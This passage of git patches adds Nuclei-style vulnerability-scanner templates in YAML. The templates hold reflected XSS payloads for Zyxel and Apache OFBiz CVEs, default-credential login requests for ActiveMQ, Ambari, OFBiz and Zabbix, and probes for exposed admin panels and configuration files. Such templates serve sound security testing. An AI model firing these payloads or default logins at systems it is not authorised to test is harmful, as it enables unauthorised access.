+    matchers:
+      - type: word
+        part: body
+        words:
+          - "\"><script>alert(1)</script>"
+      - type: word
+        part: header
+        words:
+          - "/html"
diff --git a/cves/2019/CVE-2019-9955.yaml b/cves/2019/CVE-2019-9955.yaml
new file mode 100644
index 0000000000..d10d7f49b7
--- /dev/null
+++ b/cves/2019/CVE-2019-9955.yaml
@@ -0,0 +1,18 @@
+id: CVE-2019-9955
+
+info:
+  name: CVE-2019-9955 Zyxel XSS
+  author: Ice3man
+  severity: low
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/?mobile=1&mp_idx=%22;alert(%271%27);//"
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "\";alert('1');//"
+          - "<title>Welcome</title>"
+        condition: and
diff --git a/cves/2020/CVE-2020-1943.yaml b/cves/2020/CVE-2020-1943.yaml
new file mode 100644
index 0000000000..764f723364
--- /dev/null
+++ b/cves/2020/CVE-2020-1943.yaml
@@ -0,0 +1,22 @@
+id: CVE-2020-1943
+
+info:
+  name: Apache OFBiz Reflected XSS
+  author: Ice3man
+  severity: medium
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/control/stream?contentId=<svg/onload=alert(1)>'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<svg/onload=alert(1)>"
+        part: body
+      - type: word
+        words:
+          - "/html"
+        part: header

From a90d047991cee91a7783751bcc94bf53e806ba85 Mon Sep 17 00:00:00 2001
From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com>
Date: Sun, 10 Jan 2021 18:41:25 +0530
Subject: [PATCH 29/85] Massive template checks addition :tada: :tada:

---
 .../activemq/activemq-default-login.yaml      |  22 +++
 .../ambari-default-credentials.yaml           |  19 +++
 default-logins/ofbiz-default-credentials.yaml |  20 +++
 .../zabbix-default-credentials.yaml           |  22 +++
 exposed-panels/active-admin-exposure.yaml     |  17 +++
 exposed-panels/activemq-panel.yaml            |  17 +++
 exposed-panels/adminer-exposure.yaml          | 125 ++++++++++++++++++
 exposed-panels/airflow-exposure.yaml          |  18 +++
 exposed-panels/ambari-exposure.yaml           |  17 +++
 exposed-panels/ansible-tower-exposure.yaml    |  17 +++
 exposed-panels/couchdb-exposure.yaml          |  18 +++
 exposed-panels/couchdb-fauxton.yaml           |  15 +++
 exposed-panels/django-admin-panel.yaml        |  17 +++
 exposed-panels/druid-console-exposure.yaml    |  17 +++
 .../exposed-pagespeed-global-admin.yaml       |  15 +++
 exposed-panels/exposed-webalizer.yaml         |  17 +++
 exposed-panels/flink-exposure.yaml            |  15 +++
 exposed-panels/hadoop-exposure.yaml           |  15 +++
 exposed-panels/kafka-connect-ui.yaml          |  15 +++
 exposed-panels/kafka-monitoring.yaml          |  16 +++
 exposed-panels/kafka-topics-ui.yaml           |  15 +++
 exposed-panels/kubernetes-dashboard.yaml      |  15 +++
 exposed-panels/rocketmq-console-exposure.yaml |  15 +++
 exposed-panels/selenoid-ui-exposure.yaml      |  17 +++
 exposed-panels/setup-page-exposure.yaml       |  20 +++
 exposed-panels/solr-exposure.yaml             |  15 +++
 exposed-panels/yarn-manager-exposure.yaml     |  18 +++
 exposed-panels/zipkin-exposure.yaml           |  17 +++
 .../airflow-configuration-exposure.yaml       |  17 +++
 .../amazon-docker-config-disclosure.yaml      |  17 +++
 .../configs/ansible-config-disclosure.yaml    |  17 +++
 .../configs/opcache-status-exposure.yaml      |  20 +++
 exposures/configs/perl-status.yaml            |  17 +++
 exposures/configs/rails-database-config.yaml  |  18 +++
 .../configs/symfony-database-config.yaml      |  18 +++
 exposures/configs/symfony-profiler.yaml       |  18 +++
 exposures/logs/rails-debug-mode.yaml          |  18 +++
 exposures/logs/struts-debug-mode.yaml         |  17 +++
 misconfiguration/airflow-api-exposure.yaml    |  17 +++
 misconfiguration/hadoop-unauth.yaml           |  17 +++
 vulnerabilities/other/acme-xss.yaml           |  20 +++
 .../other/aspnuke-openredirect.yaml           |  15 +++
 .../other/yarn-resourcemanager-rce.yaml       |  19 +++
 43 files changed, 851 insertions(+)
 create mode 100644 default-logins/activemq/activemq-default-login.yaml
 create mode 100755 default-logins/ambari-default-credentials.yaml
 create mode 100755 default-logins/ofbiz-default-credentials.yaml
 create mode 100755 default-logins/zabbix-default-credentials.yaml
 create mode 100755 exposed-panels/active-admin-exposure.yaml
 create mode 100755 exposed-panels/activemq-panel.yaml
 create mode 100755 exposed-panels/adminer-exposure.yaml
 create mode 100755 exposed-panels/airflow-exposure.yaml
 create mode 100644 exposed-panels/ambari-exposure.yaml
 create mode 100644 exposed-panels/ansible-tower-exposure.yaml
 create mode 100755 exposed-panels/couchdb-exposure.yaml
 create mode 100755 exposed-panels/couchdb-fauxton.yaml
 create mode 100644 exposed-panels/django-admin-panel.yaml
 create mode 100755 exposed-panels/druid-console-exposure.yaml
 create mode 100755 exposed-panels/exposed-pagespeed-global-admin.yaml
 create mode 100644 exposed-panels/exposed-webalizer.yaml
 create mode 100755 exposed-panels/flink-exposure.yaml
 create mode 100755 exposed-panels/hadoop-exposure.yaml
 create mode 100755 exposed-panels/kafka-connect-ui.yaml
 create mode 100755 exposed-panels/kafka-monitoring.yaml
 create mode 100755 exposed-panels/kafka-topics-ui.yaml
 create mode 100644 exposed-panels/kubernetes-dashboard.yaml
 create mode 100755 exposed-panels/rocketmq-console-exposure.yaml
 create mode 100755 exposed-panels/selenoid-ui-exposure.yaml
 create mode 100755 exposed-panels/setup-page-exposure.yaml
 create mode 100755 exposed-panels/solr-exposure.yaml
 create mode 100755 exposed-panels/yarn-manager-exposure.yaml
 create mode 100755 exposed-panels/zipkin-exposure.yaml
 create mode 100755 exposures/configs/airflow-configuration-exposure.yaml
 create mode 100755 exposures/configs/amazon-docker-config-disclosure.yaml
 create mode 100755 exposures/configs/ansible-config-disclosure.yaml
 create mode 100644 exposures/configs/opcache-status-exposure.yaml
 create mode 100755 exposures/configs/perl-status.yaml
 create mode 100644 exposures/configs/rails-database-config.yaml
 create mode 100755 exposures/configs/symfony-database-config.yaml
 create mode 100644 exposures/configs/symfony-profiler.yaml
 create mode 100644 exposures/logs/rails-debug-mode.yaml
 create mode 100644 exposures/logs/struts-debug-mode.yaml
 create mode 100755 misconfiguration/airflow-api-exposure.yaml
 create mode 100644 misconfiguration/hadoop-unauth.yaml
 create mode 100755 vulnerabilities/other/acme-xss.yaml
 create mode 100644 vulnerabilities/other/aspnuke-openredirect.yaml
 create mode 100755 vulnerabilities/other/yarn-resourcemanager-rce.yaml

diff --git a/default-logins/activemq/activemq-default-login.yaml b/default-logins/activemq/activemq-default-login.yaml
new file mode 100644
index 0000000000..c6546895c8
--- /dev/null
+++ b/default-logins/activemq/activemq-default-login.yaml
@@ -0,0 +1,22 @@
+id: activemq-default-login
+
+info:
+  name: Apache ActiveMQ Default Credentials
+  author: Ice3man
+  severity: medium
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/admin/'
+    headers:
+      Authorization: "Basic YWRtaW46YWRtaW4="
+    matchers:
+      - type: word
+        words:
+          - 'Welcome to the Apache ActiveMQ Console of <b>'
+          - '<h2>Broker</h2>'
+        condition: and
+
+    # We could add a request condition block to only send this request if the 
+    # site response URL had activeMQ broker stuff in the source.
diff --git a/default-logins/ambari-default-credentials.yaml b/default-logins/ambari-default-credentials.yaml
new file mode 100755
index 0000000000..fe461837dd
--- /dev/null
+++ b/default-logins/ambari-default-credentials.yaml
@@ -0,0 +1,19 @@
+id: ambari-default-credentials
+
+info:
+  name: Apache Ambari Default Credentials
+  author: Ice3man
+  severity: medium
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name'
+    headers:
+      Authorization: "Basic YWRtaW46YWRtaW4="
+    matchers:
+      - type: word
+        words:
+          - '"Users" : {'
+          - 'AMBARI.'
+        condition: and
\ No newline at end of file
diff --git a/default-logins/ofbiz-default-credentials.yaml b/default-logins/ofbiz-default-credentials.yaml
new file mode 100755
index 0000000000..8f9d9c1374
--- /dev/null
+++ b/default-logins/ofbiz-default-credentials.yaml
@@ -0,0 +1,20 @@
+id: ofbiz-default-credentials
+
+info:
+  name: Apache OfBiz Default Credentials
+  author: Ice3man
+  severity: medium
+
+requests:
+  - method: POST
+    path:
+      - '{{BaseURL}}/control/login'
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+    body: USERNAME=admin&PASSWORD=ofbiz&FTOKEN=&JavaScriptEnabled=Y
+    matchers:
+      - type: word
+        words:
+          - "ofbiz-pagination-template"
+          - "<span>Powered by OFBiz</span>"
+        condition: and
\ No newline at end of file
diff --git a/default-logins/zabbix-default-credentials.yaml b/default-logins/zabbix-default-credentials.yaml
new file mode 100755
index 0000000000..5202d88398
--- /dev/null
+++ b/default-logins/zabbix-default-credentials.yaml
@@ -0,0 +1,22 @@
+id: zabbix-default-credentials
+
+info:
+  name: Zabbix Default Credentials
+  author: Ice3man
+  severity: critical
+
+requests:
+  - method: POST
+    path:
+      - '{{BaseURL}}/index.php'
+    headers:
+      - Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+      - X-Requested-With: XMLHttpRequest
+    body: name=Admin&password=zabbix&autologin=1&enter=Sign+in
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "zabbix.php?action=dashboard.view"
+      - type: status
+        status: 302
\ No newline at end of file
diff --git a/exposed-panels/active-admin-exposure.yaml b/exposed-panels/active-admin-exposure.yaml
new file mode 100755
index 0000000000..0654ef10c2
--- /dev/null
+++ b/exposed-panels/active-admin-exposure.yaml
@@ -0,0 +1,17 @@
+id: active-admin-exposure
+
+info:
+  name: ActiveAdmin Admin Dasboard Exposure
+  author: Ice3man
+  severity: medium
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/admin/login'
+    matchers:
+      - type: word
+        words:
+          - "active_admin_content"
+          - "active_admin-"
+        condition: and
\ No newline at end of file
diff --git a/exposed-panels/activemq-panel.yaml b/exposed-panels/activemq-panel.yaml
new file mode 100755
index 0000000000..9265ab0e96
--- /dev/null
+++ b/exposed-panels/activemq-panel.yaml
@@ -0,0 +1,17 @@
+id: activemq-panel
+
+info:
+  name: Apache ActiveMQ Exposure
+  author: Ice3man
+  severity: info
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/'
+    matchers:
+      - type: word
+        words:
+          - '<h2>Welcome to the Apache ActiveMQ!</h2>'
+          - '<title>Apache ActiveMQ</title>'
+        condition: and
\ No newline at end of file
diff --git a/exposed-panels/adminer-exposure.yaml b/exposed-panels/adminer-exposure.yaml
new file mode 100755
index 0000000000..1e0a0e3326
--- /dev/null
+++ b/exposed-panels/adminer-exposure.yaml
@@ -0,0 +1,125 @@
+id: adminer-exposure
+
+info:
+  name: Adminer Exposure
+  author: Ice3man
+  severity: medium
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/adminer-4.7.0.php'
+      - '{{BaseURL}}/adminer-4.6.0-mysql-en.php'
+      - '{{BaseURL}}/adminer/adminer.php'
+      - '{{BaseURL}}/adminer-4.6.0-en.php'
+      - '{{BaseURL}}/adminer-4.6.2-mysql.php'
+      - '{{BaseURL}}/adminer-4.6.1-mysql.php'
+      - '{{BaseURL}}/adminer-4.7.2.php'
+      - '{{BaseURL}}/adminer-4.0.1/'
+      - '{{BaseURL}}/adminer-4.6.3-mysql-en.php'
+      - '{{BaseURL}}/adminer-4.3.1-mysql-en.php'
+      - '{{BaseURL}}/adminer-3.3.1/'
+      - '{{BaseURL}}/adminer-3.6.1/'
+      - '{{BaseURL}}/adminer-4.6.2.php'
+      - '{{BaseURL}}/adminer-4.0.3.php'
+      - '{{BaseURL}}/adminer-4.3.0.php'
+      - '{{BaseURL}}/adminer-4.6.1.php'
+      - '{{BaseURL}}/adminer-4.2.5-en.php'
+      - '{{BaseURL}}/data/adminer.php'
+      - '{{BaseURL}}/adminer/index.php'
+      - '{{BaseURL}}/adminer-4.2.0.php'
+      - '{{BaseURL}}/adminer-4.5.0-mysql.php'
+      - '{{BaseURL}}/admin/adminer.php'
+      - '{{BaseURL}}/adminer-4.7.2-mysql.php'
+      - '{{BaseURL}}/adminer-4.2.2/'
+      - '{{BaseURL}}/adminer-4.5.0.php'
+      - '{{BaseURL}}/adminer-3.6.0/'
+      - '{{BaseURL}}/webadminer.php'
+      - '{{BaseURL}}/adminer-4.0.3/'
+      - '{{BaseURL}}/adminer-4.1.0.php'
+      - '{{BaseURL}}/adminer-3.3.2/'
+      - '{{BaseURL}}/adminer-4.6.2-en.php'
+      - '{{BaseURL}}/adminer-4.7.1-mysql.php'
+      - '{{BaseURL}}/public/adminer.php'
+      - '{{BaseURL}}/adminer-4.1.0/'
+      - '{{BaseURL}}/adminer-4.5.0-en.php'
+      - '{{BaseURL}}/adminer-4.2.4/'
+      - '{{BaseURL}}/adminer-4.6.2-mysql-en.php'
+      - '{{BaseURL}}/adminer.php'
+      - '{{BaseURL}}/adminer-4.7.0-mysql-en.php'
+      - '{{BaseURL}}/adminer-4.4.0-mysql.php'
+      - '{{BaseURL}}/adminer-4.3.1.php'
+      - '{{BaseURL}}/adminer-4.6.0-mysql.php'
+      - '{{BaseURL}}/adminer-4.2.3/'
+      - '{{BaseURL}}/_adminer.php'
+      - '{{BaseURL}}/adminer-3.3.3/'
+      - '{{BaseURL}}/adminer-3.3.0/'
+      - '{{BaseURL}}/php/adminer.php'
+      - '{{BaseURL}}/adminer-3.1.0/'
+      - '{{BaseURL}}/adminer-4.6.3-mysql.php'
+      - '{{BaseURL}}/adminer-4.7.2-mysql-en.php'
+      - '{{BaseURL}}/adminer-4.4.0-en.php'
+      - '{{BaseURL}}/publicadminer.php'
+      - '{{BaseURL}}/adminer1.php'
+      - '{{BaseURL}}/adminer-4.7.3-mysql.php'
+      - '{{BaseURL}}/adminer-4.6.3-en.php'
+      - '{{BaseURL}}/adminer-4.2.5-mysql-en.php'
+      - '{{BaseURL}}/adminer-3.0.0/'
+      - '{{BaseURL}}/adminer-3.5.0/'
+      - '{{BaseURL}}/adminer-3.6.4/'
+      - '{{BaseURL}}/adminer-4.7.3-mysql-en.php'
+      - '{{BaseURL}}/adminer-3.2.2/'
+      - '{{BaseURL}}/adminer-3.0.1/'
+      - '{{BaseURL}}/tools/adminer.php'
+      - '{{BaseURL}}/adminer-4.7.1.php'
+      - '{{BaseURL}}/adminer-4.0.3-mysql.php'
+      - '{{BaseURL}}/adminer-4.2.5-mysql.php'
+      - '{{BaseURL}}/adminer-3.5.1/'
+      - '{{BaseURL}}/adminer-3.6.3/'
+      - '{{BaseURL}}/adminer-4.3.0-mysql-en.php'
+      - '{{BaseURL}}/web/adminer.php'
+      - '{{BaseURL}}/adminer-3.2.1/'
+      - '{{BaseURL}}/adminer/'
+      - '{{BaseURL}}/adminer-4.6.2-cs.php'
+      - '{{BaseURL}}/adminer-4.2.0-mysql.php'
+      - '{{BaseURL}}/adminer-4.5.0-mysql-en.php'
+      - '{{BaseURL}}/adminer-4.3.1-mysql.php'
+      - '{{BaseURL}}/adminer-4.1.0-mysql.php'
+      - '{{BaseURL}}/adminer-4.7.1-mysql-en.php'
+      - '{{BaseURL}}/adminer-4.3.1-en.php'
+      - '{{BaseURL}}/adminer-4.7.0-en.php'
+      - '{{BaseURL}}/adminer-4.6.1-mysql-en.php'
+      - '{{BaseURL}}/adminer-4.7.2-en.php'
+      - '{{BaseURL}}/adminer-4.2.0/'
+      - '{{BaseURL}}/adminer-3.6.2/'
+      - '{{BaseURL}}/adminer-4.4.0-mysql-en.php'
+      - '{{BaseURL}}/toolsadminer.php'
+      - '{{BaseURL}}/adminer-3.7.0/'
+      - '{{BaseURL}}/adminer-4.2.5.php'
+      - '{{BaseURL}}/adminer-3.2.0/'
+      - '{{BaseURL}}/adminer-4.4.0.php'
+      - '{{BaseURL}}/adminer-4.7.3.php'
+      - '{{BaseURL}}/adminer-4.3.0-en.php'
+      - '{{BaseURL}}/adminer-4.6.3.php'
+      - '{{BaseURL}}/adminer-4.0.2/'
+      - '{{BaseURL}}/wp-content/plugins/adminer/adminer.php'
+      - '{{BaseURL}}/adminer-3.4.0/'
+      - '{{BaseURL}}/adminer-4.0.0/'
+      - '{{BaseURL}}/adminer-4.7.1-en.php'
+      - '{{BaseURL}}/adminer-4.3.0-mysql.php'
+      - '{{BaseURL}}/adminer-4.2.1/'
+      - '{{BaseURL}}/adminer-4.6.0.php'
+      - '{{BaseURL}}/adminer-3.7.1/'
+      - '{{BaseURL}}/adminadminer.php'
+      - '{{BaseURL}}/adminer-3.3.4/'
+      - '{{BaseURL}}/adminer-4.6.1-en.php'
+      - '{{BaseURL}}/adminer-4.7.3-en.php'
+      - '{{BaseURL}}/adminer-4.7.0-mysql.php'
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "Login - Adminer"
+      - type: status
+        status:
+          - 200
diff --git a/exposed-panels/airflow-exposure.yaml b/exposed-panels/airflow-exposure.yaml
new file mode 100755
index 0000000000..b02e422796
--- /dev/null
+++ b/exposed-panels/airflow-exposure.yaml
@@ -0,0 +1,18 @@
+id: airflow-exposure
+
+info:
+  name: Apache Airflow Exposure / Unauthenticated Access
+  author: Ice3man
+  severity: medium
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/'
+      - '{{BaseURL}}/admin/'
+    matchers:
+      - type: word
+        words:
+          - '<title>Airflow - DAGs</title>'
+          - '<a href="https://github.com/apache/airflow">'
+        condition: and
\ No newline at end of file
diff --git a/exposed-panels/ambari-exposure.yaml b/exposed-panels/ambari-exposure.yaml
new file mode 100644
index 0000000000..b44f058832
--- /dev/null
+++ b/exposed-panels/ambari-exposure.yaml
@@ -0,0 +1,17 @@
+id: ambari-exposure
+
+info:
+  name: Apache Ambari Exposure / Unauthenticated Access
+  author: Ice3man
+  severity: medium
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/'
+    matchers:
+      - type: word
+        words:
+          - '<title>Ambari</title>'
+          - 'href="http://www.apache.org/licenses/LICENSE-2.0"'
+        condition: and
\ No newline at end of file
diff --git a/exposed-panels/ansible-tower-exposure.yaml b/exposed-panels/ansible-tower-exposure.yaml
new file mode 100644
index 0000000000..11de49fcfc
--- /dev/null
+++ b/exposed-panels/ansible-tower-exposure.yaml
@@ -0,0 +1,17 @@
+id: ansible-tower-exposure
+
+info:
+  name: Ansible Tower Exposure
+  author: Ice3man
+  severity: low
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/'
+    matchers:
+      - type: word
+        words:
+          - "<title>Ansible Tower</title>"
+          - "ansible-main-menu"
+        condition: and
\ No newline at end of file
diff --git a/exposed-panels/couchdb-exposure.yaml b/exposed-panels/couchdb-exposure.yaml
new file mode 100755
index 0000000000..68942ed1f2
--- /dev/null
+++ b/exposed-panels/couchdb-exposure.yaml
@@ -0,0 +1,18 @@
+id: couchdb-exposure
+
+info:
+  name: Apache CouchDB Exposure
+  author: Ice3man
+  severity: low
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/_all_dbs'
+    matchers:
+      - type: word
+        words:
+          - CouchDB/
+          - Erlang OTP/
+        part: header
+        condition: and
\ No newline at end of file
diff --git a/exposed-panels/couchdb-fauxton.yaml b/exposed-panels/couchdb-fauxton.yaml
new file mode 100755
index 0000000000..f5d9d52103
--- /dev/null
+++ b/exposed-panels/couchdb-fauxton.yaml
@@ -0,0 +1,15 @@
+id: couchdb-fauxton
+
+info:
+  name: Apache CouchDB Fauxton Exposure
+  author: Ice3man
+  severity: low
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/'
+    matchers:
+      - type: word
+        words:
+          - '<title>Project Fauxton</title>'
\ No newline at end of file
diff --git a/exposed-panels/django-admin-panel.yaml b/exposed-panels/django-admin-panel.yaml
new file mode 100644
index 0000000000..30dc04e6c4
--- /dev/null
+++ b/exposed-panels/django-admin-panel.yaml
@@ -0,0 +1,17 @@
+id: django-admin-panel
+
+info:
+  name: Python Django Admin Panel
+  author: Ice3man
+  severity: low
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/admin/login/?next=/admin/"
+    matchers:
+      - type: word
+        words:
+          - "<a href=\"/admin/\">Django administration</a>"
+        condition: and
+        part: body
\ No newline at end of file
diff --git a/exposed-panels/druid-console-exposure.yaml b/exposed-panels/druid-console-exposure.yaml
new file mode 100755
index 0000000000..fd70fd8bf0
--- /dev/null
+++ b/exposed-panels/druid-console-exposure.yaml
@@ -0,0 +1,17 @@
+id: druid-console-exposure
+
+info:
+  name: Alibaba Druid Console Exposure
+  author: Ice3man
+  severity: medium
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/'
+    matchers:
+      - type: word
+        words:
+          - 'src="/druid.js"'
+          - 'href="/druid.css"'
+        condition: and
\ No newline at end of file
diff --git a/exposed-panels/exposed-pagespeed-global-admin.yaml b/exposed-panels/exposed-pagespeed-global-admin.yaml
new file mode 100755
index 0000000000..568072f374
--- /dev/null
+++ b/exposed-panels/exposed-pagespeed-global-admin.yaml
@@ -0,0 +1,15 @@
+id: exposed-pagespeed-global-admin
+
+info:
+  name: Apache PageSpeed Global Admin Dashboard Exposure
+  author: Ice3man
+  severity: medium
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/pagespeed_admin/'
+    matchers:
+      - type: word
+        words:
+          - "<b>Pagespeed Admin</b>"
\ No newline at end of file
diff --git a/exposed-panels/exposed-webalizer.yaml b/exposed-panels/exposed-webalizer.yaml
new file mode 100644
index 0000000000..21f33ad15a
--- /dev/null
+++ b/exposed-panels/exposed-webalizer.yaml
@@ -0,0 +1,17 @@
+id: exposed-webalizer
+
+info:
+  name: Publicly exposed Webalizer Interface
+  author: Ice3man
+  severity: low
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/webalizer/'
+    matchers:
+      - type: word
+        words:
+          - "Webalizer Version"
+          - "Usage statistics for"
+        condition: and
\ No newline at end of file
diff --git a/exposed-panels/flink-exposure.yaml b/exposed-panels/flink-exposure.yaml
new file mode 100755
index 0000000000..155c090b58
--- /dev/null
+++ b/exposed-panels/flink-exposure.yaml
@@ -0,0 +1,15 @@
+id: flink-exposure
+
+info:
+  name: Apache Flink Exposure
+  author: Ice3man
+  severity: low
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/'
+    matchers:
+      - type: word
+        words:
+          - '<title>Apache Flink Web Dashboard</title>'
\ No newline at end of file
diff --git a/exposed-panels/hadoop-exposure.yaml b/exposed-panels/hadoop-exposure.yaml
new file mode 100755
index 0000000000..efefde4127
--- /dev/null
+++ b/exposed-panels/hadoop-exposure.yaml
@@ -0,0 +1,15 @@
+id: hadoop-exposure
+
+info:
+  name: Apache Hadoop Exposure
+  author: Ice3man
+  severity: low
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/dfshealth.html'
+    matchers:
+      - type: word
+        words:
+          - '<div class="navbar-brand">Hadoop</div>'
\ No newline at end of file
diff --git a/exposed-panels/kafka-connect-ui.yaml b/exposed-panels/kafka-connect-ui.yaml
new file mode 100755
index 0000000000..973910c087
--- /dev/null
+++ b/exposed-panels/kafka-connect-ui.yaml
@@ -0,0 +1,15 @@
+id: kafka-connect-ui
+
+info:
+  name: Apache Kafka Connect UI Exposure
+  author: Ice3man
+  severity: low
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/'
+    matchers:
+      - type: word
+        words:
+          - '<title>Kafka Connect UI</title>'
\ No newline at end of file
diff --git a/exposed-panels/kafka-monitoring.yaml b/exposed-panels/kafka-monitoring.yaml
new file mode 100755
index 0000000000..c6d4183b66
--- /dev/null
+++ b/exposed-panels/kafka-monitoring.yaml
@@ -0,0 +1,16 @@
+id: kafka-monitoring
+
+info:
+  name: Apache Kafka Monitor Exposure
+  author: Ice3man
+  severity: low
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/'
+    matchers:
+      - type: word
+        words:
+          - '>KafkaMonitor</a>'
+          - '>Kafka Monitor GUI</h1>'
\ No newline at end of file
diff --git a/exposed-panels/kafka-topics-ui.yaml b/exposed-panels/kafka-topics-ui.yaml
new file mode 100755
index 0000000000..8e4a823e28
--- /dev/null
+++ b/exposed-panels/kafka-topics-ui.yaml
@@ -0,0 +1,15 @@
+id: kafka-topics-ui
+
+info:
+  name: Apache Kafka Topics UI Exposure
+  author: Ice3man
+  severity: low
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/'
+    matchers:
+      - type: word
+        words:
+          - '<title>Kafka Topics UI - Browse Kafka Data</title>'
\ No newline at end of file
diff --git a/exposed-panels/kubernetes-dashboard.yaml b/exposed-panels/kubernetes-dashboard.yaml
new file mode 100644
index 0000000000..b50e6d4155
--- /dev/null
+++ b/exposed-panels/kubernetes-dashboard.yaml
@@ -0,0 +1,15 @@
+id: kubernetes-dashboard
+
+info:
+  name: Kubernetes Console Exposure
+  author: Ice3man
+  severity: low
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/"
+    matchers:
+      - type: word
+        words:
+          - "Kubernetes Dashboard</title>"
\ No newline at end of file
diff --git a/exposed-panels/rocketmq-console-exposure.yaml b/exposed-panels/rocketmq-console-exposure.yaml
new file mode 100755
index 0000000000..26c5fe99bc
--- /dev/null
+++ b/exposed-panels/rocketmq-console-exposure.yaml
@@ -0,0 +1,15 @@
+id: rocketmq-console-exposure
+
+info:
+  name: Apache RocketMQ Console Exposure
+  author: Ice3man
+  severity: medium
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/'
+    matchers:
+      - type: word
+        words:
+          - "<title>RocketMq-console-ng</title>"
\ No newline at end of file
diff --git a/exposed-panels/selenoid-ui-exposure.yaml b/exposed-panels/selenoid-ui-exposure.yaml
new file mode 100755
index 0000000000..4742cd906d
--- /dev/null
+++ b/exposed-panels/selenoid-ui-exposure.yaml
@@ -0,0 +1,17 @@
+id: selenoid-ui-exposure
+
+info:
+  name: Selenoid UI Dashboard Exposure
+  author: Ice3man
+  severity: medium
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/admin/login'
+    matchers:
+      - type: word
+        words:
+          - "<title>Selenoid UI</title>"
+          - "/manifest.json"
+        condition: and
\ No newline at end of file
diff --git a/exposed-panels/setup-page-exposure.yaml b/exposed-panels/setup-page-exposure.yaml
new file mode 100755
index 0000000000..a2903098fe
--- /dev/null
+++ b/exposed-panels/setup-page-exposure.yaml
@@ -0,0 +1,20 @@
+id: setup-page-exposure
+
+info:
+  name: Zenphoto Setup Page Exposure
+  author: Ice3man
+  severity: medium
+  description: Misconfiguration on Zenphoto version < 1.5.X which lead to sensitive information disclosure
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/zp-core/setup/index.php'
+      - '{{BaseURL}}/zp/zp-core/setup/index.php'
+      - '{{BaseURL}}/gallery/zp-core/setup/index.php'
+      - '{{BaseURL}}/zenphoto/zp-core/setup/index.php'
+    matchers:
+      - type: word
+        words:
+          - Welcome to Zenphoto! This page will set up Zenphoto
+        part: body
\ No newline at end of file
diff --git a/exposed-panels/solr-exposure.yaml b/exposed-panels/solr-exposure.yaml
new file mode 100755
index 0000000000..21f878068d
--- /dev/null
+++ b/exposed-panels/solr-exposure.yaml
@@ -0,0 +1,15 @@
+id: solr-exposure
+
+info:
+  name: Apache Solr Exposure
+  author: Ice3man
+  severity: medium
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/solr/'
+    matchers:
+      - type: word
+        words:
+          - "<title>Solr Admin</title>"
\ No newline at end of file
diff --git a/exposed-panels/yarn-manager-exposure.yaml b/exposed-panels/yarn-manager-exposure.yaml
new file mode 100755
index 0000000000..bb17c90f1d
--- /dev/null
+++ b/exposed-panels/yarn-manager-exposure.yaml
@@ -0,0 +1,18 @@
+id: yarn-manager-exposure
+
+info:
+  name: Apache Yarn ResourceManager Exposure / Unauthenticated Access
+  author: Ice3man
+  severity: low
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/cluster/cluster'
+    matchers:
+      - type: word
+        words:
+          - 'hadoop'
+          - 'resourcemanager'
+          - 'logged in as: dr.who'
+        condition: and
\ No newline at end of file
diff --git a/exposed-panels/zipkin-exposure.yaml b/exposed-panels/zipkin-exposure.yaml
new file mode 100755
index 0000000000..4a0e2b1646
--- /dev/null
+++ b/exposed-panels/zipkin-exposure.yaml
@@ -0,0 +1,17 @@
+id: zipkin-exposure
+
+info:
+  name: Zipkin Exposure
+  author: Ice3man
+  severity: low
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/"
+      - "{{BaseURL}}/zipkin/"
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "webpackJsonpzipkin-lens"
\ No newline at end of file
diff --git a/exposures/configs/airflow-configuration-exposure.yaml b/exposures/configs/airflow-configuration-exposure.yaml
new file mode 100755
index 0000000000..6bbb2fe2ce
--- /dev/null
+++ b/exposures/configs/airflow-configuration-exposure.yaml
@@ -0,0 +1,17 @@
+id: airflow-configuration-exposure
+
+info:
+  name: Apache Airflow Configuration Exposure
+  author: Ice3man
+  severity: medium
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/airflow.cfg'
+    matchers:
+      - type: word
+        words:
+          - '[core]'
+          - '[api]'
+        condition: and
\ No newline at end of file
diff --git a/exposures/configs/amazon-docker-config-disclosure.yaml b/exposures/configs/amazon-docker-config-disclosure.yaml
new file mode 100755
index 0000000000..3dc66d5530
--- /dev/null
+++ b/exposures/configs/amazon-docker-config-disclosure.yaml
@@ -0,0 +1,17 @@
+id: amazon-docker-config-disclosure
+
+info:
+  name: Dockerrun AWS Configuration Exposure
+  author: Ice3man
+  severity: medium
+
+requests:
